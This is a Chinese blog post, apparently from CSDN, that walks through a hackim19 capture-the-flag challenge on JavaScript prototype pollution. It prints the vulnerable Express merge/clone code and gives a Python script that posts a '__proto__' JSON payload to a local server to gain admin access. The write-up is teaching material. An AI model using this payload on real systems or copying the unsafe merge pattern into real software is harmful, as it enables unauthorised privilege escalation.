JavaScript另外一道原型链污染例题

最新推荐文章于 2024-09-30 15:23:15 发布
最新推荐文章于 2024-09-30 15:23:15 发布
阅读量474 收藏 10
点赞数 8
文章标签: javascript 安全 渗透 原型链污染
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/141371246
版权

目录

代码

 代码分析

​编辑使用脚本进行原型链污染

结果

代码

'use strict';

const express = require('express');
const bodyParser = require('body-parser')
const cookieParser = require('cookie-parser');
const path = require('path');


const isObject = obj => obj && obj.constructor && obj.constructor === Object;

function merge(a, b) {
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {

            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }
    return a
}

function clone(a) {
    return merge({}, a);
}

// Constants
const PORT = 8080;
const HOST = '0.0.0.0';
const admin = {};

// App
const app = express();
app.use(bodyParser.json())
app.use(cookieParser());

app.use('/', express.static(path.join(__dirname, 'views')));
app.post('/signup', (req, res) => {
    var body = JSON.parse(JSON.stringify(req.body)); // {"__proto__": {"admin":1}}
    //传递的值
var copybody = clone(body)
//你传递什么值就是啥值
    if (copybody.name) {
        res.cookie('name', copybody.name).json({
            "done": "cookie set"
        });
    } else {
        res.json({
            "error": "cookie not set"
        })
    }
});
app.get('/getFlag', (req, res) => {
//获取cookie,如果admin.admin=1就获取cookie,JSON.stringify将JavaScript转换为JSON的字符串,然后再用JSON.parse进行解析
    var аdmin = JSON.parse(JSON.stringify(req.cookies))
    if (admin.аdmin == 1) {
        res.send("hackim19{}");
    } else {
        res.send("You are not authorized");
    }
});
app.listen(PORT, HOST);
console.log(`Running on http://${HOST}:${PORT}`);

 代码分析

当出现了这两个函数就有可能是JavaScript原型链污染

function merge(a, b) {
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }
    return a
}

function clone(a) {
    return merge({}, a);
}

merge就是如果有两个相同的key值后者会将前置进行一个覆盖

然后我们尝试传入一个数值(传入如下面代码),触发clone然后触发merge,尝试进行一个原型链污染,但是测试结果是无法进行污染,admin这个对象还是未定义,原因是在我们在创建字典的时候已经作为__proto__给test赋值了,所以test.__proto__中是有admin属性了。__proto__并不被认为是一个键名

var test = {"test1":"aaa","__proto__":{"admin":1}}
//我们想要达到的效果,相当于给test1的原型对像构造了一个函数admin=1

那么我们如何达到我们的目的,那就想办法让__proto__被认为是一个键名,我们可以使用下面代码,我们在下面子代码中使用JSON.parse解析代码,这样在下面代码中__proto__就会被认为是一个键名

var test = JSON.parse('{"test1":"aaa","__proto__":{"admin":1}}')

现在我们开启环境

使用脚本进行原型链污染

import requests
import json
url1 = "http://127.0.0.1:8080/getflag"
url2 = "http://127.0.0.1:8080/signup"
s = requests.session()
headers = {"Content-Type":"application/json"}
//data1的原型对象是Object
data1 = {"__proto__":{"admin":1}}

res1 = s.post(url2,headers=headers,data = json.dumps(data1))
res2 = s.get(url1)
print(res2.text)

使用上述代码,代码走到下图这里的时候a是{},a的__proto__是Object.prototype,然后b是你输入的值{"admin":1},b的__proto__就等于//当代码走到这里时a是{}他的__proto__是Object.prototype,然后b是你输入的值,b的__proto__就等于{"admin":1},再往下走进行递归,b[attr]是1,b[attr]就不是一个对象了就走到else里面了,然后a[attr]=Object.prototype[admin],b[attr]就是b[admin]等于1。最后写入的形态就是这样:Object.prototype.admin=1

结果

板栗妖怪
关注
原型链污染漏洞+前后端实战案例
08-04
JavaScript编程中,原型链(Prototype Chain)是理解对象继承机制的关键。原型链污染漏洞是一种安全问题,它允许攻击者通过篡改或注入代码来操纵对象的原型,从而可能导致数据泄漏、逻辑错误甚至完全控制应用程序...
Web前端面试题目JavaScript(作用域,原型。原型链,闭包,封装函数).txt
07-06
前端面试题,包含JavaScript的闭包,作用域,原型,原型链,上下文环境以及DOM,BOM封装函数深度克隆,以及一些常见的·JS问题,试题简单但是容易混淆,作为前端工程师必考题
一道简单的JavaScript原型链污染例题:hackit 2018
banliyaoguai的博客
08-20 794
任何对象都有prototype属性,这个属性就是实例对象的原型对象,然后原型对象上如果添加一个属性,所有实例都会共享这个属性。比如object的tostring方法。这个原型对象的属性绑定在构造函数上,且当实例对象有某个属性或方法就不会再去原型对象找这个方法或属性。然后__proto__可以指向当前对象的原型对象。我们对__proto__赋值就可以修改原型对象的值。
网络安全原型链污染
m0_68976043的博客
08-03 2929
从以上的简单抛出和讲解我们不难看出原型链污染玩的就是两个重要的概念1.原型继承2.属性查找机制,让我们维持着这两个理念看看题型,在题型中理解原型链污染JavaScript中的对象可以通过原型继承从其他对象继承属性和方法。每个对象都有一个指向其原型的链接,通过这个链接可以访问原型对象的属性和方法。当访问一个对象的属性或方法时,JavaScript引擎会首先在对象本身查找,如果找不到,它会沿着原型链向上查找,直到找到属性或方法或者到达原型链的末端。
JavaScript Prototype污染攻击(CTF 例题分析)
a3320315的博客
11-03 2042
0x01 先谈谈自己的理解 function a(){} var b=new a() var c = {} a.__proto__.__proto__ == b.__proto__.__proto__ == c.__proto__ a.__proto__ != b.__proto__ != c 这个时候 b的__proto__ 指向的就是a.prototype a.prototype的_...
网络安全专家齐成岳:NodeJS从零开始到原型链污染
04-22 481
前言 因为近段时间包括去年,在打CTF的时候确实有遇到NodeJS的题目,但是从来没系统学习,所以拿到题很懵。不知道应该从什么地方入手,所以决定去学习一下,但是之前没怎么学过JavaScript,语法之类的更是不懂,所以在此之前,花了三五天的时间,一边做题一边恶补了JavaScript的基础。 才开始写这篇文章。 NodeJS基础 简单介绍(多一句嘴,确实是从零基础开始的): Node.js 是一个基于 Chr...
JavaScript-cnblog
凌歆的博客
03-11 1612
前端面试JavaScript部分
【面试题】三道面试题让你掌握JavaScript中的执行上下文与作用域以及闭包
web全栈开发的博客
03-08 587
大厂面试题分享 面试题库前后端面试题库 (面试必备) 推荐:★★★★★前端面试题库大家好,笔者呢最近再回顾JavaScript知识时,又看到了JavaScript的一些较为常见的内容,仔细看了之后发现之前理解的并不深,所以给记录了下来,加深印象。执行上下文与执行栈作用域与作用域链闭包。作用域是可访问的变量,对象,函数的结合,同时也决定了这些变量的可访问全局作用域是说在最外层的函数以及不在任何函数或者打括号中声明的变量,都在全局作用域下,程序中任务位置都可以访问的变量函数作用域。
JavaScript灵魂之问」前端知识梳理之 JS 篇(下篇)
超逸の学习技术博客
09-19 416
三元运算基础 开门见山,三元运算,我想对于很多编程语言都有提到,下面就简单一个例子来讲解一下好了。 var str = 89 > 9? ('89' > '9'? '通过了': '内层未通过') : '外层未通过'; console.log(str); 答案是 内层未通过,注意 '89' > '9'的比较,由于都是字符串,会从第一位以 ASCII码来进行比较。由于89第一位为8,于是小于 9,返回 false,走后面那个,最后打印了 内层未通过。 浅拷贝 var person1 = {
闭包、立即执行函数、this
whisper49的博客
07-07 1415
闭包、立即执行函数、this关键字
2021 前端工程师 面试题(仅题目)
申雨茜的博客
12-29 2459
小米提前批一面二面 一面: 1、公司项目对你印象深刻的点是哪里,遇到过什么样的问题,如何解决的? 答:开始以为面试官小姐姐是hr,因为昨天晚上约的我电话,于是我叙述项目的时候说的很笼统,没有提技术关键字,很尴尬。 2、公司项目对你最大的收获是什么? 答:从头开始学习了vue项目匹配的UI框架,element-ui。学习到了团队协作的重要性, 参与了git的联动开发。 3、es6有在项目中用过吗?请举例说明。 答:当时一股脑想了一下就说出了箭头函数,let和const还有promise(其实promise我掌
JavaScript:对象与原型链教程.docx
08-28
JavaScript:对象与原型链教程.docx
如何搭建Vue脚手架
w6437286的博客
09-26 468
本文主要讲解如何搭建vue脚手架。
knowLedge-Vue I18n 是 Vue.js 的国际化插件
2301_76671906的博客
09-30 593
Vue 2 中使用 Vue I18n 插件实现中英文切换
Vue实战教程:如何用JS封装一个可复用的Loading组件
Jiaberrr的博客
09-28 423
通过以上步骤,我们成功在Vue项目中封装了一个可复用的Loading组件。在实际开发中,我们可以根据项目需求对Loading组件进行样式和功能的扩展,使其更加完善。封装组件是提高代码复用性和维护性的有效手段,希望本文能对你有所帮助。
Web认识 -- 第一课
最新发布
ZxVSaccount的博客
09-30 797
这里是我们进入前端学习的开端,在本次更新之后我会陆续上传html,css,javaScript等相关语言的教程,有感兴趣的小伙伴们点点关注,未来我们一起学习!IE、火狐和谷歌是目前互联网上的三大浏览器,其他常用的浏览器还有苹果的Safari浏览器和欧朋浏览器等。对于一般的网站,只要兼容IE浏览器、火狐浏览器和谷歌浏览器,就能满足绝大多数用户的需求。本节主要简单介绍了一下关于HTML、CSS、JavaScript的一些基本概念,有感兴趣的朋友,点点关注我们一起学习,博主持续更新中!
前端规范工程-2:JS代码规范(Prettier + ESLint)
Vinca@的博客
09-26 714
Prettier 主要关注代码的格式,而 ESLint 则关注代码的质量和规范。结合使用这两个工具,可以极大地提高代码的可读性和维护性,同时减少潜在的错误和不一致性。
【开源免费】基于SpringBoot+Vue.JS校园资料分享平台(JAVA毕业设计)
customer08的博客
09-30 947
校园资料分享平台是一个B/S模式系统,采用Spring Boot框架作为开发技术,MYSQL数据库设计开发,充分保证系统的稳定性。系统具有界面清晰、操作简单,功能齐全的特点,使得校园资料分享平台管理工作系统化、规范化。
JavaScript原型与原型链深度解析
"JavaScript中原型和原型链详解" 在JavaScript中,原型(Prototype)和原型链(Prototype Chain)是实现对象继承的重要机制。每个JavaScript对象都包含一个内部的[[Prototype]]属性,通常通过`.prototype`来访问。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值